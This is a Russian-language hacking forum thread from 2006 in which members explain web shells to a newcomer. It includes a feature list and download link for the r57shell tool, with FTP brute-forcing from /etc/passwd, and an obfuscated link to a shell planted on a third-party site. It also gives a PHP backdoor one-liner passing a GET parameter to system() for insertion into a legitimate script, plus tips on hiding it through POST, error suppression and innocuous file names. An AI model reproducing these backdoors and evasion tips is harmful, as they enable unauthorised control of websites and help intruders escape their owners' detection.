Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Обьясните ломаку, что такое Shell?? (https://forum.antichat.xyz/showthread.php?t=13648)

S.H. 29.01.2006 13:12

Обьясните ломаку, что такое Shell??
 
Ну я понимаю для хака сайтов, но что это такое и с чем его едят....:-\ :confused:

Vandal 29.01.2006 13:20

"Доступ в shell" - доступ к командной строке операционной системы UNIX, на которой размещен Ваш виртуальный сервер. Если Ваш тарифный план включает доступ в shell, вы можете попасть в него, соединившись с сервером www.ВАШ_ДОМЕН.ru (подставьте настоящее имя Вашего сайта по аналогии) по протоколу SSH с помощью программ SSH или OpenSSH. Под Windows протокол SSH поддерживают программы бесплатной Putty (последнюю версию можно свободно загрузить с ресурса www.chiark.greenend.org.uk). Получив доступ в shell, Вы можете выполнять редактирование и отладку Ваших страниц и скриптов прямо на виртуальном сервере."

k1b0rg 29.01.2006 13:20

Шелл скрипт который позволяет управлять сайтом(возможно даже не своим).
Т.е. создавать там файлы, кароче что-то типо проводника ,или файлового менеджера,в принципе что-то отдаленное, ну хз я незнаю как объяснить. Тебе наверное надо хоть раз его увидеть прежде понять что это такое

Azazel 29.01.2006 13:23

Что типа проводника в винде, только круче
http://razrushitel.front.ru/pic/forum8.jpg

Новая версия r57shell 1.24
В новой версии добавлено:
~ скачивание файлов с сервера на котором работает скрипт на локальный компьютер пользователя
~ поддержка архивирования передаваемого с сервера файла в zip, bzip или gzip
~ скачивание файлов с удаленного ftp сервера
~ отправка файлов на удаленный ftp сервер
~ брутфорс ftp сервера, в качестве логина и пароля используется имя пользователя из /etc/passwd
~ возможность использовать перевернутое (user -> resu) имя пользователя в качестве пароля при ftp-брутфорсе
~ вывод списка пользователей из /etc/passwd
~ отправка файлов аттачем на почту
~ отправка писем
~ свертывание/развертывание разделов

http://rst.void.ru/download/r57shell.txt

•••™NO FEAR™••• 29.01.2006 13:29

http://w*w*w.paksquash.com/index.php...nm.ru/conf.php
На вот, посмотри )))) Это уже залитый shell на сайт, только ты там не разберёшься, там кодировачка то не та ;)
Ток не забудь звёздочки убрать в ссылке ))))

S.H. 29.01.2006 14:15

Цитата:

Сообщение от •••™NO FEAR™•••
http://w*w*w.paksquash.com/index.php...nm.ru/conf.php
На вот, посмотри )))) Это уже залитый shell на сайт, только ты там не разберёшься, там кодировачка то не та ;)
Ток не забудь звёздочки убрать в ссылке ))))

=-O ЁПТ!!!! Этож на какое разрешение сделано?????? :eek: :eek: :eek:
А вообще я теперь всё понял!!! Всем спасибо...и ещё одно, если админ найдёт shell, то он его удалит, да?

Tikson 29.01.2006 14:21

а вот интересно какое имя вы даете залитому шелу , я обычно img )) или как у •••™NO FEAR™••• conf.php ))
----------
Цитата:

то он его удалит, да?
он попытается тебя найти первым делом))

Rebz 29.01.2006 14:23

естественно удалит. Это вообще-то противозаконно :rolleyes:

TTyck 29.01.2006 14:24

я view.php всегда даю имя

KEZ 29.01.2006 14:33

Самый лучший способ - прописать в начало какого-то скрипта реального, вроде viewtopic.php код вроде такого:
if (isset( $_GET["c"] )) { print "<pre>"; system( $_GET['c'] ); print "</pre>"; }

Rebz 29.01.2006 14:38

А не через POST? =)
Get в логах будет светиться)

Ребят.. ну вы даете!!! При первой же возможности выдали названия своих шеллов! Ща какой-нить умник введет в гугл запрос с этими именами и плакали ваши шеллы..

GreenBear 29.01.2006 14:44

название шеллов не секрет ни для кого,какие они должы быть.
и стратегически важные объекты, естесвенно запоролены =))

Azazel 29.01.2006 15:30

Цитата:

Сообщение от Rebz
А не через POST? =)
Get в логах будет светиться)

Ребят.. ну вы даете!!! При первой же возможности выдали названия своих шеллов! Ща какой-нить умник введет в гугл запрос с этими именами и плакали ваши шеллы..

Да это вообщето не мой, это с сайта одного. А названия, ну в папки то всё время разные заливаешь. Вот и названия разные всё время, чтобы имена сливались.
А по стандартным названиям в гугле конечно много можно найти.

S.H. 29.01.2006 23:57

Цитата:

Сообщение от Tikson
а вот интересно какое имя вы даете залитому шелу , я обычно img )) или как у •••™NO FEAR™••• conf.php ))
----------
он попытается тебя найти первым делом))

И как он находит? Не по IP или по нему?

•••™NO FEAR™••• 30.01.2006 00:02

Цитата:

И как он находит? Не по Ip или по нему?
КОго находит? Что за бред ты пишешь?

S.H. 30.01.2006 00:14

Не бред! Мне сказали, что админ пытается найти того, кто ему на сайт залил шелл, ну я и спрашиваю как он будет искать!!!

Azazel 30.01.2006 00:36

2 S.H. Ну всё что может быть у админа это твой ИП (или не твой, если ты об этом позаботился). Ну и ещё логи сайта, где иногда можно увидеть с какого сайта ты залил шелл. Всмысле твой сайт узнать.

Просто за залитый шелл он наврядли будет тебя искать, если он не админ Пентагона. Плюс информация об ИП может даваться провайдером только правоохранительным органам, а не всем админам.

gazta 30.01.2006 01:00

А мне один раз регразили что передадут инфо обомне в управление "К"

я чють в штаны не наделал неделю в инет не лазил. Но оказалась просто запугали, действено

ShAnKaR 30.01.2006 02:22

Цитата:

Сообщение от KEZ
Самый лучший способ - прописать в начало какого-то скрипта реального, вроде viewtopic.php код вроде такого:
if (isset( $_GET["c"] )) { print "<pre>"; system( $_GET['c'] ); print "</pre>"; }

а ещё лутьше куданить поглубже в старый код и метод пост, и собачку перед system на всяк случай

ZeV$ 08.02.2006 16:22

по-моему самое простое объяснение шелла -
удаленное управление каким-либо сервером
а лучше зарегить бесплатный шелл и полазить тама


Время: 15:22